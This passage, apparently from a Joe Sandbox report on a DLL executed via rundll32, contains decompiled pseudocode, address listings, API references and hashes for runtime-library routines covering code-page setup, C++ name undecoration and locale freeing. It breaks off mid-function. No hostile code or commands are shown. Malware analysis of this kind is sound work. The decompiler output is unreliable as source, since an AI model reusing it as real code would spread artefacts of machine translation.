								_t156 = E100318A5(_t285, _t205,  *((intOrPtr*)(_t254 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t254 + 8), _t205);
								_t266 = _t266 + 0x24;
								_t286 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E1002E537(0xff, _t286, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t254 + 8), _t205);
								_t266 = _t266 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *((char*)(_t233 + 0x7f)) = _t205;
								_v80 = _t239;
								 *((char*)(_t222 + 0x7f)) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									_push(0x1f);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t165 = memcpy(_t164, _t164 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t258 = _v56;
									if( *((intOrPtr*)(_t258 + 0x8c)) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E100268B3( *((intOrPtr*)(_t258 + 0x90)) - 0xfe);
											E100268B3( *((intOrPtr*)(_t258 + 0x94)) - 0x80);
											E100268B3( *((intOrPtr*)(_t258 + 0x98)) - 0x80);
											E100268B3( *((intOrPtr*)(_t258 + 0x8c)));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *((intOrPtr*)(_t258 + 0x8c)) = _t166;
									 *_t258 = _v72;
									 *((intOrPtr*)(_t258 + 0x90)) = _v76;
									 *((intOrPtr*)(_t258 + 0x94)) = _v80;
									 *((intOrPtr*)(_t258 + 0x98)) = _v84;
									 *(_t258 + 4) = _v60;
									L44:
									E100268B3(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t254 + 8) != 0xfde9) {
									_t251 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t251[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t259 =  *_t251 & 0x000000ff;
										_v64 = _t259;
										__eflags = _t259 - (_t183 & 0x000000ff);
										if(_t259 > (_t183 & 0x000000ff)) {
											L37:
											_t251 =  &(_t251[2]);
											__eflags =  *_t251;
											if( *_t251 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t259;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t260 = _t207 - 0xffffff00 + _t259 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t260 = 0x8000;
											_t260 = _t260 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t251[1] & 0x000000ff);
										} while (_t230 <= (_t251[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t253 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t253 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t284 =  *(_t254 + 8) - 0xfde9;
							if( *(_t254 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t263 =  *_t236 & 0x000000ff;
									__eflags = _t263 - (_t197 & 0x000000ff);
									if(_t263 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t263 + _t232)) = 0x20;
										_t263 = _t263 + 1;
										__eflags = _t263 - (_t236[1] & 0x000000ff);
									} while (_t263 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t254 = _v56;
								goto L22;
							}
							E100050F0(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t266 = _t266 + 0xc;
							goto L22;
						}
					}
				}
				_t204 = E10037D5C(__edx,  &_v92, 0, _t213, 0x1004, _t131);
				_t266 = _t265 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}

0x1002e7a1
0x1002e7a9
0x1002e7b0
0x1002e7b5
0x1002e7b8
0x1002e7bb
0x1002e7be
0x1002e7c0
0x1002e7c3
0x1002e7c9
0x1002e7cc
0x1002e7cf
0x1002e7d2
0x1002e7d7
0x1002ebba
0x1002ebbc
0x1002ebbe
0x1002ebbe
0x1002ebc1
0x1002ebc7
0x1002ebc7
0x1002ebc9
0x1002ebcf
0x1002ebd5
0x1002ebdf
0x1002ebe9
0x1002ebf0
0x1002ebfe
0x1002ebfe
0x1002e7dd
0x1002e7e0
0x1002e7e5
0x1002e803
0x1002e80d
0x1002e810
0x1002e823
0x1002e826
0x1002e833
0x1002e836
0x1002e839
0x1002e84b
0x1002e84e
0x1002e860
0x1002e863
0x1002e868
0x1002e86e
0x1002eb83
0x1002eb86
0x1002eb8e
0x1002eb94
0x1002eb9c
0x1002eba6
0x1002eba6
0x00000000
0x1002e87d
0x1002e87d
0x1002e882
0x00000000
0x1002e899
0x1002e899
0x1002e89b
0x1002e89b
0x1002e89e
0x1002e89f
0x1002e8b5
0x00000000
0x00000000
0x1002e8bb
0x1002e8c1
0x00000000
0x00000000
0x1002e8c7
0x1002e8ca
0x1002e8d0
0x1002e926
0x1002e929
0x1002e933
0x1002e948
0x1002e94c
0x1002e951
0x1002e954
0x1002e956
0x00000000
0x00000000
0x1002e97f
0x1002e984
0x1002e987
0x1002e989
0x00000000
0x00000000
0x1002e9a4
0x1002e9aa
0x1002e9af
0x1002e9b4
0x00000000
0x00000000
0x1002e9ba
0x1002e9c3
0x1002e9c9
0x1002e9cc
0x1002e9cf
0x1002e9d2
0x1002e9d5
0x1002e9db
0x1002e9de
0x1002e9e1
0x1002e9e4
0x1002e9e6
0x1002e9ec
0x1002e9ef
0x1002e9f1
0x1002eac1
0x1002eac8
0x1002eac9
0x1002ead4
0x1002ead7
0x1002ead9
0x1002eae3
0x1002eae6
0x1002eae8
0x1002eaf1
0x1002eaf3
0x1002eaf5
0x1002eaf6
0x1002eb01
0x1002eb06
0x1002eb0a
0x1002eb18
0x1002eb2b
0x1002eb39
0x1002eb44
0x1002eb49
0x1002eb0a
0x1002eb4c
0x1002eb4f
0x1002eb55
0x1002eb5e
0x1002eb63
0x1002eb6c
0x1002eb75
0x1002eb7e
0x1002eba7
0x1002ebaa
0x1002ebb0
0x00000000
0x1002ebb0
0x1002e9fe
0x1002ea57
0x1002ea5a
0x1002ea5d
0x00000000
0x00000000
0x1002ea5f
0x1002ea62
0x1002ea62
0x1002ea65
0x1002ea67
0x00000000
0x00000000
0x1002ea69
0x1002ea6f
0x1002ea72
0x1002ea74
0x1002eab7
0x1002eab7
0x1002eaba
0x1002eabd
0x00000000
0x00000000
0x00000000
0x1002eabd
0x1002ea7c
0x1002ea85
0x1002ea87
0x1002ea87
0x1002ea89
0x1002ea8c
0x1002ea8f
0x1002ea92
0x1002ea94
0x1002ea99
0x1002ea9c
0x1002ea9f
0x1002eaa2
0x1002eaa4
0x1002eaa9
0x1002eaaa
0x1002eaaa
0x1002eaae
0x1002eab1
0x1002eab4
0x00000000
0x1002eab4
0x1002eabf
0x1002eabf
0x00000000
0x1002eabf
0x1002ea07
0x1002ea0a
0x1002ea17
0x1002ea19
0x1002ea1e
0x1002ea21
0x1002ea24
0x1002ea2c
0x1002ea2e
0x1002ea3c
0x1002ea3f
0x1002ea42
0x1002ea45
0x1002ea47
0x1002ea4a
0x1002ea4e
0x00000000
0x1002ea55
0x1002e8d2
0x1002e8d9
0x1002e8f3
0x1002e8f6
0x1002e8f9
0x00000000
0x00000000
0x1002e8fb
0x1002e8fe
0x1002e8fe
0x1002e901
0x1002e903
0x00000000
0x00000000
0x1002e905
0x1002e90b
0x1002e90d
0x1002e91c
0x1002e91c
0x1002e91f
0x1002e921
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1002e90f
0x1002e90f
0x1002e90f
0x1002e913
0x1002e918
0x1002e918
0x00000000
0x1002e90f
0x1002e923
0x00000000
0x1002e923
0x1002e8e9
0x1002e8ee
0x00000000
0x1002e8ee
0x1002e882
0x1002e86e
0x1002e7f3
0x1002e7f8
0x1002e7fd
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 1002E810
_free.LIBCMT ref: 1002E826
_free.LIBCMT ref: 1002E839
_free.LIBCMT ref: 1002E84E
_free.LIBCMT ref: 1002E863
GetCPInfo.KERNEL32(?,?), ref: 1002E8AD

Part of subcall function 10037D5C: _free.LIBCMT ref: 10037DC7

_free.LIBCMT ref: 1002EB18
_free.LIBCMT ref: 1002EB2B
_free.LIBCMT ref: 1002EB39
_free.LIBCMT ref: 1002EB44
_free.LIBCMT ref: 1002EB86
_free.LIBCMT ref: 1002EB8E
_free.LIBCMT ref: 1002EB94
_free.LIBCMT ref: 1002EB9C
_free.LIBCMT ref: 1002EBAA

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 22b5d432cea9fd06f40ce3240ce7cfafdfae1d2acd31acad9b6352b27ddabbd5
Instruction ID: a43070e0b0711e41ad9a0cb5ae2b548a2436ceb787582ea256af61a5ca8909b4
Opcode Fuzzy Hash: 22b5d432cea9fd06f40ce3240ce7cfafdfae1d2acd31acad9b6352b27ddabbd5
Instruction Fuzzy Hash: 7CD19E75D002859FDB11CFA4D881BEEBBF5FF08300F944169E995A7282DB71AD458B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000B7FB, Relevance: 19.8, APIs: 13, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E1000B7FB(void* __edx, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				char _v172;
				char _v180;
				char _v188;
				char _v196;
				char _v204;
				char _v212;
				char _v220;
				char _v228;
				char _v236;
				char _v244;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr _t93;
				signed int* _t96;
				char* _t99;
				void* _t101;
				signed int* _t102;
				void* _t106;
				void* _t109;
				void* _t118;
				void* _t122;
				void* _t125;
				char* _t129;
				void* _t131;
				void* _t132;
				void* _t135;
				char* _t141;
				void* _t144;
				signed int* _t153;
				signed int _t164;
				char* _t174;
				signed int* _t176;
				char* _t177;
				intOrPtr* _t182;
				signed int* _t186;
				signed int* _t191;
				signed int _t196;
				signed int* _t199;
				void* _t203;
				signed int _t204;
				signed int* _t206;
				void* _t207;

				_t203 = __edx;
				_t206 = _a4;
				 *_t206 =  *_t206 & 0x00000000;
				_t206[1] = _t206[1] & 0x00000000;
				_t164 = 0;
				while(1) {
					_t90 =  *0x1004e004; // 0x0
					_t91 =  *_t90;
					if(_t91 == 0 || _t91 == 0x40) {
						break;
					}
					if( *0x1004e010 == 0 ||  *0x1004e011 != 0) {
						if( *_t206 != 0) {
							_v44 = "::";
							_v40 = 2;
							_t185 = E1000723E( &_v108,  &_v44);
							E100076A6(_t156,  &_v52, _t206);
							 *_t206 = _v52;
							_t206[1] = _v48;
							if(_t164 != 0) {
								_t186 = E10007637(_t185,  &_v116, 0x5b, _t206);
								_t207 = _t207 + 0xc;
								_t164 = 0;
								 *_t206 =  *_t186;
								_t206[1] = _t186[1];
							}
						}
						_t99 =  *0x1004e004; // 0x0
						if( *_t99 != 0x3f) {
							_t101 = E1000CF24(_t203,  &_v92, 1, 0);
							_t174 =  &_v100;
							L36:
							_t207 = _t207 + 0xc;
							L37:
							_t102 = E100076A6(_t101, _t174, _t206);
							L38:
							_t176 = _t102;
							 *_t206 =  *_t176;
							_t206[1] = _t176[1];
							L39:
							if(_t206[1] == 0) {
								continue;
							}
							break;
						}
						_t15 = _t99 + 1; // 0x1
						_t177 = _t15;
						 *0x1004e004 = _t177;
						_t106 =  *_t177 - 0x24;
						if(_t106 == 0) {
							_t71 = _t177 - 1; // 0x0
							 *0x1004e004 = _t71;
							_t101 = E1000CF24(_t203,  &_v244, 1, 0);
							_t174 =  &_v84;
							goto L36;
						}
						_t109 = _t106 - 1;
						if(_t109 == 0) {
							L32:
							E100071BE( &_v76, 0x1004e004, 0x40);
							_v68 = "`anonymous namespace\'";
							_v64 = 0x15;
							E100076A6(E1000723E( &_v236,  &_v68),  &_v20, _t206);
							 *_t206 = _v20;
							_t206[1] = _v16;
							_t182 =  *0x1004dffc; // 0x0
							__eflags =  *_t182 - 9;
							if(__eflags != 0) {
								E100078F0(_t182,  &_v76);
							}
							goto L39;
						}
						_t118 = _t109 - 0x1a;
						if(_t118 == 0) {
							__eflags =  *((char*)(_t177 + 1)) - 0x5f;
							if(__eflags != 0) {
								L31:
								_push( &_v204);
								_t122 = E10007637(_t177,  &_v212, 0x60, L10009B9E(_t164, _t177, _t203, _t204, _t206, __eflags));
								_t207 = _t207 + 0x10;
								_t101 = E100076C8(_t122,  &_v220, 0x27);
								_t174 =  &_v228;
								goto L37;
							}
							__eflags =  *((char*)(_t177 + 2)) - 0x3f;
							if(__eflags != 0) {
								goto L31;
							}
							_t52 = _t177 + 1; // 0x2
							 *0x1004e004 = _t52;
							_t125 = E1000AB0E(_t203,  &_v188, 0, 0);
							_t207 = _t207 + 0xc;
							_t191 = E100076A6(_t125,  &_v196, _t206);
							 *_t206 =  *_t191;
							_t206[1] = _t191[1];
							_t129 =  *0x1004e004; // 0x0
							__eflags =  *_t129 - 0x40;
							if(__eflags != 0) {
								goto L39;
							}
							L30:
							 *0x1004e004 =  *0x1004e004 + 1;
							goto L39;
						}
						_t131 = _t118;
						if(_t131 == 0) {
							goto L32;
						}
						_t132 = _t131 - 8;
						if(_t132 == 0) {
							_t46 = _t177 + 1; // 0x2
							 *0x1004e004 = _t46;
							_t135 = E1000CF24(_t203,  &_v164, 1, 0);
							_t207 = _t207 + 0xc;
							_t102 = E100076A6(E100076C8(_t135,  &_v172, 0x5d),  &_v180, _t206);
							_t164 = 1;
							goto L38;
						}
						_t222 = _t132 == 8;
						if(_t132 == 8) {
							_t18 = _t177 + 1; // 0x2
							_t19 =  &_v8;
							 *_t19 = _v8 & 0;
							__eflags =  *_t19;
							_v12 = 0;
							 *0x1004e004 = _t18;
							while(1) {
								E1000CF24(_t203,  &_v36, 1, 0);
								_t196 = _v32;
								_t207 = _t207 + 0xc;
								__eflags = _t196;
								if(_t196 != 0) {
									_t196 = 2;
									_t204 = 0;
									__eflags = 0;
								} else {
									__eflags = _t204;
									if(_t204 == 0) {
										_t204 = _v36;
									} else {
										_v28 = _v36;
										_v24 = _t196;
										_v60 = "::";
										_v56 = 2;
										E10007748( &_v28,  &_v60);
										_t153 = E100076A6( &_v28,  &_v140,  &_v12);
										_t204 =  *_t153;
										_t196 = _t153[1];
									}
								}
								_v8 = _t196;
								_v12 = _t204;
								__eflags = _t196;
								if(__eflags != 0) {
									break;
								}
								_t141 =  *0x1004e004; // 0x0
								__eflags =  *_t141 - 0x40;
								if( *_t141 != 0x40) {
									continue;
								}
								_t144 = E10007637(_t196,  &_v148, 0x5b,  &_v12);
								_t207 = _t207 + 0xc;
								_t199 = E100076C8(_t144,  &_v156, 0x5d);
								 *_t206 =  *_t199;
								_t206[1] = _t199[1];
								goto L30;
							}
							_t206[1] = _t206[1] & 0x00000000;
							 *_t206 =  *_t206 & 0x00000000;
							_t206[1] = 2;
							goto L39;
						} else {
							_t101 = E1000A99E(_t177, _t203, _t222,  &_v124);
							_t174 =  &_v132;
							goto L37;
						}
					} else {
						L46:
						return _t206;
					}
				}
				_t92 =  *0x1004e004; // 0x0
				_t93 =  *_t92;
				if(_t93 == 0) {
					__eflags =  *_t206;
					_push(1);
					if( *_t206 != 0) {
						_v20 = "::";
						_v16 = 2;
						_t96 = E100076A6(E10007684(E100072DE( &_v100),  &_v92,  &_v20),  &_v84, _t206);
						 *_t206 =  *_t96;
						_t206[1] = _t96[1];
					} else {
						E10007596(_t206);
					}
				} else {
					if(_t93 != 0x40) {
						_t206[1] = _t206[1] & 0x00000000;
						 *_t206 =  *_t206 & 0x00000000;
						_t206[1] = 2;
					}
				}
				goto L46;
			}

0x1000b7fb
0x1000b806
0x1000b80a
0x1000b80d
0x1000b811
0x1000b813
0x1000b813
0x1000b818
0x1000b81c
0x00000000
0x00000000
0x1000b831
0x1000b843
0x1000b848
0x1000b853
0x1000b864
0x1000b866
0x1000b86e
0x1000b873
0x1000b878
0x1000b886
0x1000b888
0x1000b88b
0x1000b88f
0x1000b894
0x1000b894
0x1000b878
0x1000b897
0x1000b89f
0x1000bb15
0x1000bb1a
0x1000bb1d
0x1000bb1d
0x1000bb20
0x1000bb24
0x1000bb29
0x1000bb29
0x1000bb2d
0x1000bb32
0x1000bb35
0x1000bb39
0x00000000
0x00000000
0x00000000
0x1000bb39
0x1000b8a5
0x1000b8a5
0x1000b8a8
0x1000b8b1
0x1000b8b4
0x1000baf0
0x1000baf5
0x1000bb03
0x1000bb08
0x00000000
0x1000bb08
0x1000b8ba
0x1000b8bd
0x1000ba97
0x1000baa1
0x1000baa9
0x1000bab7
0x1000baca
0x1000bad2
0x1000bad7
0x1000bada
0x1000bae0
0x1000bae3
0x1000bae9
0x1000bae9
0x00000000
0x1000bae3
0x1000b8c3
0x1000b8c6
0x1000ba03
0x1000ba07
0x1000ba5e
0x1000ba64
0x1000ba74
0x1000ba79
0x1000ba87
0x1000ba8c
0x00000000
0x1000ba8c
0x1000ba09
0x1000ba0d
0x00000000
0x00000000
0x1000ba0f
0x1000ba14
0x1000ba22
0x1000ba27
0x1000ba39
0x1000ba3d
0x1000ba42
0x1000ba45
0x1000ba4a
0x1000ba4d
0x00000000
0x00000000
0x1000ba53
0x1000ba53
0x00000000
0x1000ba53
0x1000b8cd
0x1000b8d0
0x00000000
0x00000000
0x1000b8d6
0x1000b8d9
0x1000b9c2
0x1000b9c7
0x1000b9d5
0x1000b9da
0x1000b9f7
0x1000b9fc
0x00000000
0x1000b9fc
0x1000b8df
0x1000b8e2
0x1000b8f8
0x1000b8fb
0x1000b8fb
0x1000b8fb
0x1000b8fe
0x1000b901
0x1000b906
0x1000b90e
0x1000b913
0x1000b916
0x1000b919
0x1000b91b
0x1000b965
0x1000b966
0x1000b966
0x1000b91d
0x1000b91d
0x1000b91f
0x1000b95e
0x1000b921
0x1000b924
0x1000b92a
0x1000b931
0x1000b938
0x1000b93f
0x1000b952
0x1000b957
0x1000b959
0x1000b959
0x1000b91f
0x1000b968
0x1000b96b
0x1000b96e
0x1000b970
0x00000000
0x00000000
0x1000b972
0x1000b977
0x1000b97a
0x00000000
0x00000000
0x1000b989
0x1000b98e
0x1000b9a1
0x1000b9a5
0x1000b9aa
0x00000000
0x1000b9aa
0x1000b9b2
0x1000b9b6
0x1000b9b9
0x00000000
0x1000b8e4
0x1000b8e8
0x1000b8ee
0x00000000
0x1000b8ee
0x1000bba7
0x1000bba7
0x1000bbac
0x1000bbac
0x1000b831
0x1000bb3f
0x1000bb44
0x1000bb48
0x1000bb5b
0x1000bb5e
0x1000bb60
0x1000bb6e
0x1000bb75
0x1000bb97
0x1000bb9e
0x1000bba3
0x1000bb62
0x1000bb64
0x1000bb64
0x1000bb4a
0x1000bb4c
0x1000bb4e
0x1000bb52
0x1000bb55
0x1000bb55
0x1000bb4c
0x00000000

APIs

DName::operator+.LIBCMT ref: 1000B866
DName::operator+.LIBCMT ref: 1000B99C

Part of subcall function 10007748: shared_ptr.LIBCMT ref: 10007764

DName::operator+.LIBCMT ref: 1000B9E8
DName::operator+.LIBCMT ref: 1000B9F7
DName::operator+.LIBCMT ref: 1000B952

Part of subcall function 1000CF24: DName::operator=.LIBVCRUNTIME ref: 1000CFB3

DName::operator+.LIBCMT ref: 1000BB24
DName::operator=.LIBVCRUNTIME ref: 1000BB64
DName::DName.LIBVCRUNTIME ref: 1000BB7C
DName::operator+.LIBCMT ref: 1000BB8B
DName::operator+.LIBCMT ref: 1000BB97

Part of subcall function 1000CF24: Replicator::operator[].LIBVCRUNTIME ref: 1000CF61

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID:
API String ID: 1026175760-0
Opcode ID: 31b5ecf051329b541345bd7913f4edbac89e0eeeccac291c9b78518f8dea3edb
Instruction ID: 865cfd34c394bda65aa44f7df4ae2116b870d9faa91fa5b2e98e0a47c1a3d343
Opcode Fuzzy Hash: 31b5ecf051329b541345bd7913f4edbac89e0eeeccac291c9b78518f8dea3edb
Instruction Fuzzy Hash: 9AC1BF71D006489FEB20CFA4C985FEEBBF8EB05380F10445DE14AE7289EB75AA44CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1002E173, Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002E173(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x1004d788) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E100268B3(_t46);
							E1002EC4B( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E100268B3(_t47);
							E1002F136( *((intOrPtr*)(_t74 + 0x88)));
						}
						E100268B3( *((intOrPtr*)(_t74 + 0x7c)));
						E100268B3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E100268B3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E100268B3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E100268B3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E100268B3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E1002E2E4( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x1004d178) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E100268B3(_t31);
							E100268B3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E100268B3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E100268B3(_t74);
			}

0x1002e17b
0x1002e17f
0x1002e187
0x1002e190
0x1002e195
0x1002e19c
0x1002e1a4
0x1002e1ac
0x1002e1b7
0x1002e1bd
0x1002e1be
0x1002e1c6
0x1002e1ce
0x1002e1d9
0x1002e1df
0x1002e1e3
0x1002e1ee
0x1002e1f4
0x1002e195
0x1002e1f5
0x1002e1fd
0x1002e210
0x1002e223
0x1002e231
0x1002e23c
0x1002e241
0x1002e24a
0x1002e252
0x1002e253
0x1002e259
0x1002e25c
0x1002e25f
0x1002e266
0x1002e268
0x1002e26c
0x1002e274
0x1002e27b
0x1002e281
0x1002e282
0x1002e282
0x1002e289
0x1002e28b
0x1002e290
0x1002e298
0x1002e29d
0x1002e29e
0x1002e29e
0x1002e2a1
0x1002e2a4
0x1002e2a7
0x1002e2aa
0x1002e2aa
0x1002e2ba

APIs

___free_lconv_mon.LIBCMT ref: 1002E1B7

Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC68
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC7A
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC8C
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002EC9E
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECB0
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECC2
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECD4
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECE6
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ECF8
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED0A
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED1C
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED2E
Part of subcall function 1002EC4B: _free.LIBCMT ref: 1002ED40

_free.LIBCMT ref: 1002E1AC

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 1002E1CE
_free.LIBCMT ref: 1002E1E3
_free.LIBCMT ref: 1002E1EE
_free.LIBCMT ref: 1002E210
_free.LIBCMT ref: 1002E223
_free.LIBCMT ref: 1002E231
_free.LIBCMT ref: 1002E23C
_free.LIBCMT ref: 1002E274
_free.LIBCMT ref: 1002E27B
_free.LIBCMT ref: 1002E298
_free.LIBCMT ref: 1002E2B0

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 44666f3e792033bf78c52a5bc1681bd2bdcfbab39e3579f54de7d788c7dc3adf
Instruction ID: b2064f8893aa3c5965b5dc156e633d10c076f5acde63b25f045ac74ecc00f496
Opcode Fuzzy Hash: 44666f3e792033bf78c52a5bc1681bd2bdcfbab39e3579f54de7d788c7dc3adf
Instruction Fuzzy Hash: DA315A31A40381DFEB20DAB8FD41B4A73E9EF04394FA14529F85AD6291DE30BD548B60

Uniqueness

Uniqueness Score: -1.00%

Function 1002ED49, Relevance: 18.4, APIs: 12, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1002ED49(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
